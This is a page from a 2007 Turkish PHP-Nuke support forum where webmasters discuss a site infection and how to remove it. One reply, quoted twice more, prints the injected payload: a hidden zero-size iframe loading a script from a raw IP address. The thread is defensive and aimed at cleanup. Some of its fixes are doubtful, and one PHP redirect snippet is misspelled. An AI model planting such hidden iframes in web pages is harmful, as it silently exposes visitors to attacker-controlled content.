Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 717
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 ??? Sitem deki Haberleri ..
(26568 okuma, 26 yanıt)
 Free Hosta Php Nuke Kurul..
(17195 okuma, 14 yanıt)
 EKLENTİ: Misafire mesajın..
(38644 okuma, 38 yanıt)
 Php Nuke 9.0 Geliyor..
(21720 okuma, 19 yanıt)
 Bu başlık için mesaj bulu..
(14745 okuma, 15 yanıt)
 Facebook Sohbet Tipi Sohb..
(18613 okuma, 15 yanıt)
 üye aktivasyon..
(11084 okuma, 8 yanıt)
 Facebook tarzı altbar... ..
(6539 okuma, 1 yanıt)
 kaldırmak istediğim bölüm..
(6822 okuma, 2 yanıt)
 Resimli RSS..
(24145 okuma, 25 yanıt)
 Onay linkini kaldirmak..
(11510 okuma, 8 yanıt)
 Yardım :( Site açılırken ..
(6939 okuma, 2 yanıt)
 .Htaccess ile uzantıda ke..
(8643 okuma, 4 yanıt)
 block genişliği..
(5935 okuma, 1 yanıt)
 Haber Resimleri ve Slide ..
(15084 okuma, 12 yanıt)
 Foruma büyük boyutlu resi..
(7658 okuma, 3 yanıt)
 Php-Nuke 8.0 Paket..
(9809 okuma, 6 yanıt)
 Hangi sürümü önerirsiniz?..
(10920 okuma, 8 yanıt)
 ethai1 3..
(13723 okuma, 10 yanıt)
 Yeni PEHASPESEO..
(73016 okuma, 82 yanıt)
 Türkçe Karakter sorunu ?..
(39294 okuma, 36 yanıt)
 tek modul için sağ ve sol..
(11889 okuma, 8 yanıt)
 Php-nuke8.0 başlıklarda t..
(11018 okuma, 8 yanıt)
 Phpden iyi anlayan..
(5685 okuma, 1 yanıt)
 Php nuke 7.6 - 3.1 patch ..
(76379 okuma, 89 yanıt)
 Mp3 Üst Player Yardım..
(31024 okuma, 40 yanıt)
 Toplu üyelik silme?..
(11610 okuma, 8 yanıt)
 Çözümleyemediğim hata.....
(12993 okuma, 11 yanıt)
 bloğu kayan hale getirmek..
(6189 okuma, 2 yanıt)
 Makale modulu..
(8948 okuma, 5 yanıt)
 PHP-Nuke Haber V.1 Paylas..
(89209 okuma, 121 yanıt)
 title değiştirme..
(10752 okuma, 6 yanıt)
 Arkadaşlar bu sorunun çöz..
(10448 okuma, 6 yanıt)
 Php Nuke 8.1..
(4521 okuma, 0 yanıt)
 merhaba..
(10721 okuma, 9 yanıt)
 Anasayfa için boş modül o..
(14077 okuma, 13 yanıt)
 admin panelinde Access De..
(6677 okuma, 2 yanıt)
 Bu başlığa hiç cevap gelm..
(27576 okuma, 25 yanıt)
 Nuke Tema yapilisi..
(17768 okuma, 16 yanıt)
 Mavisce-net temasina bann..
(9088 okuma, 6 yanıt)
 PHP-Nuke wTeam - eklentil..
(6907 okuma, 2 yanıt)
 coppermine hata..
(11162 okuma, 8 yanıt)
 içerik tanıtımı..
(6537 okuma, 2 yanıt)
 Haber Ve İçeriğe Resim Ek..
(7462 okuma, 3 yanıt)
 google keywords..
(9364 okuma, 6 yanıt)
 8.0'da html sorunu..
(5730 okuma, 1 yanıt)
 PHP-Nuke_8.1.3.5+NukeSent..
(56497 okuma, 76 yanıt)
 üye olunurken gereksiz is..
(10445 okuma, 7 yanıt)
 Arkadaşlar kolifa haber s..
(6605 okuma, 2 yanıt)
 Hesabınız'a tıklayınca te..
(10925 okuma, 7 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Siteme Trojan girmiş ne yapabilirm
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Siteme Trojan girmiş ne yapabilirm
Sayfaya git Önceki  1, 2
 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2007-07-27, 20:44:47    Mesaj konusu: Alıntıyla Cevap Gönder

o eskidendi kardeş beyaz sayfa çıkmışsa ya dosyalarında yazma izni yoktur ya da hostunda fopen kapalıdır.

gokhan büyük ihtimal mail ile geliyodur bu virüs çünkü web üzerinden çalışan bişey değil, öyle olmasa yazma izni olmayan dosyalara yazamazdı
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-24, 06:14:50    Mesaj konusu: Forum Arası Reklamlar


Başa dön
ozcancem
Mesaj: 1+
Mesaj: 1+





Kayıt: Jul 27, 2007
Mesajlar: 5

MesajTarih: 2007-07-27, 20:50:45    Mesaj konusu: Alıntıyla Cevap Gönder

ya daha 2 güne kadar çalışıyodu sitenin yedeğini alıp dosyaları tüm silip yeniden yüklesem düzelir demi??
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2007-07-27, 22:37:02    Mesaj konusu: Alıntıyla Cevap Gönder

yedeklerin düzgünse çalışır
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
omerfaruk_02
Mesaj: 100+
Mesaj: 100+





Kayıt: Jun 02, 2007
Mesajlar: 149

MesajTarih: 2007-07-27, 23:46:00    Mesaj konusu: Alıntıyla Cevap Gönder

Arkadaşlar ftp'deki bütün dosyları indirip içindekileri temizlesem.Sonra ftpdeki dosyaları silip yerine temizlediklerimi yüklesem siteme bişey olur mu?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
gokhan87
Mesaj: 300+
Mesaj: 300+





Kayıt: Oct 20, 2006
Mesajlar: 348

MesajTarih: 2007-07-28, 00:20:40    Mesaj konusu: Alıntıyla Cevap Gönder

Seyranli bende öyle düşündüm sonradan farkettim virusun ismini bence sitenize yapılan uploadlarda bi tarama yapın arkadaşlar en kral virüs programı bile bazen kaçırabiliyo ...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2007-07-28, 02:08:22    Mesaj konusu: Alıntıyla Cevap Gönder

ömerfaruk herhangi bi zararın olmaz
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
trakyalim
Mesaj: 300+
Mesaj: 300+





Kayıt: Feb 26, 2004
Mesajlar: 379
Konum: Almanya

MesajTarih: 2007-07-28, 09:58:20    Mesaj konusu: Alıntıyla Cevap Gönder

virus tekrar bulasmamasi icin bulasan dosyalarin chmod ayarini 444 yapin birdaha gelmez
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
gokhan87
Mesaj: 300+
Mesaj: 300+





Kayıt: Oct 20, 2006
Mesajlar: 348

MesajTarih: 2007-07-28, 10:00:06    Mesaj konusu: Alıntıyla Cevap Gönder

tirakyalim bence en güzel cozumu onerdi ...payylasim icin tesekkur ..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-24, 06:14:50    Mesaj konusu: Forum Arası Reklamlar


Başa dön
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2007-07-28, 13:29:24    Mesaj konusu: Alıntıyla Cevap Gönder

bence chmod ile alakalı değil. çünkü bulaştığı yerlerin zaten yazma izni olmuyor.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Affection
Mesaj: 1+
Mesaj: 1+





Kayıt: Aug 02, 2007
Mesajlar: 1

MesajTarih: 2007-08-02, 00:08:43    Mesaj konusu: Re: Siteme Trojan girmiş ne yapabilirm Alıntıyla Cevap Gönder

Sevgili Arkadaslar sanırım bu virus hakkında ayrıntılı bilginiz yok ben açıklayayım burada ve diğer arkadaslarda onlemlerini alsınlar biz turkiyede buyuk bir host firmasıyız bu virusle daha once karsılasmıstık. İlk önce virus kendını index.asp default.asp main.asp index.html vs turu ilk okuyucu türlere gizli bir i f r a m e olarak atmaktadır. örnek : <i f r a m e src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e> şu anda gunceli bu bunun bulastıgı yer ise arkadasların dedigi gibi cmod vs zannedilsin diye kurnazca yapılmış host yetkililerini uyarınız bu virus web wiz forumun kendi forumlarınının linkleri kaldırıldıgında savunma amacı ile uretilmiş illegal bir virusdur. kurulan web wiz forum altında bulun bis .js dosyası aracılıgı ile tüm hosttaki yada bulundugu hosttaki ilk okucu türlere bulaşmaktadır Sevgili arkadaşımız. bunu kaldırmanın yolu diger hhosttaki dosyalarınızı tekrar atmanıza gerek yok hosttaki baslangıc tür dosyanız ne ise örnek default.asp sadece ona bulasmıstır onu indirerek içindeki i f r a m e li bölümü siliniz. sonra kaydedip tekrar gonderiniz bir iki gun surekli takip ediniz. i f r a m e aynı yere kendını tekrar kaydederse anlayınki host makinasında hala virus barınıyor. Herkeze Kolay Gelsin Teşekkürler.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
evil_dead
Mesaj: 1+
Mesaj: 1+





Kayıt: Aug 02, 2007
Mesajlar: 1

MesajTarih: 2007-08-02, 23:46:16    Mesaj konusu: Re: Siteme Trojan girmiş ne yapabilirm Alıntıyla Cevap Gönder

Affection :
Sevgili Arkadaslar sanırım bu virus hakkında ayrıntılı bilginiz yok ben açıklayayım burada ve diğer arkadaslarda onlemlerini alsınlar biz turkiyede buyuk bir host firmasıyız bu virusle daha once karsılasmıstık. İlk önce virus kendını index.asp default.asp main.asp index.html vs turu ilk okuyucu türlere gizli bir i f r a m e olarak atmaktadır. örnek : <i f r a m e src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e> şu anda gunceli bu bunun bulastıgı yer ise arkadasların dedigi gibi cmod vs zannedilsin diye kurnazca yapılmış host yetkililerini uyarınız bu virus web wiz forumun kendi forumlarınının linkleri kaldırıldıgında savunma amacı ile uretilmiş illegal bir virusdur. kurulan web wiz forum altında bulun bis .js dosyası aracılıgı ile tüm hosttaki yada bulundugu hosttaki ilk okucu türlere bulaşmaktadır Sevgili arkadaşımız. bunu kaldırmanın yolu diger hhosttaki dosyalarınızı tekrar atmanıza gerek yok hosttaki baslangıc tür dosyanız ne ise örnek default.asp sadece ona bulasmıstır onu indirerek içindeki i f r a m e li bölümü siliniz. sonra kaydedip tekrar gonderiniz bir iki gun surekli takip ediniz. i f r a m e aynı yere kendını tekrar kaydederse anlayınki host makinasında hala virus barınıyor. Herkeze Kolay Gelsin Teşekkürler.


iyi güzel demiştinde dünden beri 10 tane falan sildim tüm dosyaları gezdim i f r a m e ile başlayan hiçbirşey bırakmadım hepsini kaydettim ama siteme hala ulaşamıyorum internet explorer dan firefox tan girebildim sitenin yazılarının yarısı perişan site www.gamsizforum.info buyur bak ne yapılabilir başka kod barındırma ihtimali var mı bi YARDIM edin kafayı yiyeceğim...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Turkekip
Mesaj: 50+
Mesaj: 50+





Kayıt: Apr 04, 2007
Mesajlar: 78

MesajTarih: 2007-08-09, 01:07:36    Mesaj konusu: Alıntıyla Cevap Gönder

arkadaslar bu tür saldırılar ve r57 tipi saldırılar öncelikle sitenizin yazma yani chmod ayarı 777 olan klasör ve klasör içindeki chmod ayarı 666 olan dosyaları etkiler ama etkileme sürecinde unutmamanız gereken şey sadece saldırı yazma izni olan klasör yada dosyaya değil belki sitenizin ana sayfasındaki index.php içine dahi kod yerleştirebiliyor.

bu saldırı sitenin modul uzantı dosyası olan örnein modules.php dosyası gibi dosyaların devamını kontrol ederek yapıyor

botların tek tek modulleri ve modul içindeki dosyaları analiz etmesi de söz konusudur

kişisel web siteme bu tur saldırıları engellemek için bir sistem kontrolu yazmıştım

phpnuke için bunu uyarlayıp sizinle paylasacagım ancak belirtmem gerekirki

en ufak detay dahi olsa gözardı etmeyiniz gerek dosyalarınızdaki kod acıkları ve gerekse chmod ayarları olsun ve birazda sakin olun....
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2007-08-09, 13:43:54    Mesaj konusu: Re: Siteme Trojan girmiş ne yapabilirm Alıntıyla Cevap Gönder

Affection :
Sevgili Arkadaslar sanırım bu virus hakkında ayrıntılı bilginiz yok ben açıklayayım burada ve diğer arkadaslarda onlemlerini alsınlar biz turkiyede buyuk bir host firmasıyız bu virusle daha once karsılasmıstık. İlk önce virus kendını index.asp default.asp main.asp index.html vs turu ilk okuyucu türlere gizli bir i f r a m e olarak atmaktadır. örnek : <i f r a m e src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e> şu anda gunceli bu bunun bulastıgı yer ise arkadasların dedigi gibi cmod vs zannedilsin diye kurnazca yapılmış host yetkililerini uyarınız bu virus web wiz forumun kendi forumlarınının linkleri kaldırıldıgında savunma amacı ile uretilmiş illegal bir virusdur. kurulan web wiz forum altında bulun bis .js dosyası aracılıgı ile tüm hosttaki yada bulundugu hosttaki ilk okucu türlere bulaşmaktadır Sevgili arkadaşımız. bunu kaldırmanın yolu diger hhosttaki dosyalarınızı tekrar atmanıza gerek yok hosttaki baslangıc tür dosyanız ne ise örnek default.asp sadece ona bulasmıstır onu indirerek içindeki i f r a m e li bölümü siliniz. sonra kaydedip tekrar gonderiniz bir iki gun surekli takip ediniz. i f r a m e aynı yere kendını tekrar kaydederse anlayınki host makinasında hala virus barınıyor. Herkeze Kolay Gelsin Teşekkürler.


bunun şöyle bir ayrıntısı var....

adam bir block yapıyor sizde onu armut hesabı alıp siteniz koyuyorsunuz gösteriş olacak ya!

kod işinden anlamıyorsanız ki çoğu arkadaşımız öyle adam o kod için upload ve rwx değerlerini karşılayacak ufak bir kod hilesiyle sitenize sürekli uyguluyor sizde hostudma virüs var sanıyorsunuz....

joomla smf vbulletin voltlab forum ve portal sistemlerinde özellikle türk smözde webmaster çakal kişilerin yaptığı bloklarda veya eklentilerde buna defalarca rastladım.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
VoLKyY
Mesaj: 1+
Mesaj: 1+





Kayıt: Dec 11, 2004
Mesajlar: 2
Konum: amasya

MesajTarih: 2007-08-09, 15:53:04    Mesaj konusu: Alıntıyla Cevap Gönder

dzhakimi sitene block ekle belki olabilir bu ama bu kaynaklanan olay hosttan ibarettir. benim ayrı yerlerde bulunan 2 adet siteme bulaştı hic dosya upload etmeden. ftp yi bile acmadigim bir siteme bu i f r a m e kodları bulaşmış. bugunde www.amasyam.net e bulaşmış bunun bloklarla pek fazla ilgili olabilecegini düsünmüyorum.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Turkekip
Mesaj: 50+
Mesaj: 50+





Kayıt: Apr 04, 2007
Mesajlar: 78

MesajTarih: 2007-08-09, 16:39:37    Mesaj konusu: Re: Siteme Trojan girmiş ne yapabilirm Alıntıyla Cevap Gönder

dzhakimi arkadasımızın açıklamasıyla ne demek istediğimiz tamamen anlaşılmıştır sanırım

bu durumda nuke kullanan kullanıcılar yapması gereken basit bir önlem korunmanızı sağlayacaktır

öncelikle sitenizdeki index.php dosaysının adını portal.php olarak değiştirin

daha sonra yeni bir index.php dosyası oluşturup bu dosyanın içerisin php taglarını açın ve php tagları içerisine aşağıdaki kodu yerleştirip sitenize upload edin

Kod:


header("loaction:portal.php");
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2007-08-09, 18:41:47    Mesaj konusu: Alıntıyla Cevap Gönder

VoLKyY :
dzhakimi sitene block ekle belki olabilir bu ama bu kaynaklanan olay hosttan ibarettir. benim ayrı yerlerde bulunan 2 adet siteme bulaştı hic dosya upload etmeden. ftp yi bile acmadigim bir siteme bu i f r a m e kodları bulaşmış. bugunde www.amasyam.net e bulaşmış bunun bloklarla pek fazla ilgili olabilecegini düsünmüyorum.


senin komple sisteminde yani nuke sürümünde kullandığın forumda olası bir açık veya kod hatası veya j a v a s c r i p t'(ki en büyük sorun eski tip j a v a s c r i p t kodlardan kaynaklanıyor) ufak bir açık komple sitenizi götürebilir bu özellikle bilinçli bilinçsiz kullanılan php cgi perl scriptlerin yarattığı açıklar + buna bağlı hostunuzda php nin yarattığı güvenlik açıklarıki bunu güvenlik açığı olarak nitelendirmek hata olur çünkü php de bazı fonksiyonlar vardır çok zararlı bunları bilinçli bir hosting firması kullanımına zaten izin vermez fnksiyonları devre dışı bırakarak güvenlik sağlanır. buna rağmen siteniz ele geçiriliyorsa sitenizde kullandığınız portal sistemi yada php kodlarında mutlaka bir açık kapı var demektir; özetle hosting en son suçlanacak merkezdir.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke Tüm zamanlar GMT + 3 Saat
Sayfaya git Önceki  1, 2
2. sayfa (Toplam 2 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Siteme Başka Siteden Girişi Engellemek ? KaRNeC_81 İnternet Üzerine 1 2010-05-15, 12:34:47 Son Mesajı Görüntüle
Yeni mesaj yok siteme ulasım sorunu var yurt dısından cuneytsonmez Php Nuke Sorunlarınız 0 2010-04-29, 10:30:36 Son Mesajı Görüntüle
Yeni mesaj yok Siteme Giremiyorum cuneytsonmez Php Nuke Sorunlarınız 2 2010-04-14, 16:24:58 Son Mesajı Görüntüle
Yeni mesaj yok siteme üye olunmuyor mrtblt Php Nuke Sorunlarınız 2 2010-03-26, 14:35:11 Son Mesajı Görüntüle
Yeni mesaj yok Siteme Hiç bir şekilde ulaşılamıyor ... hamzot Php Nuke Sorunlarınız 5 2010-02-20, 22:52:29 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright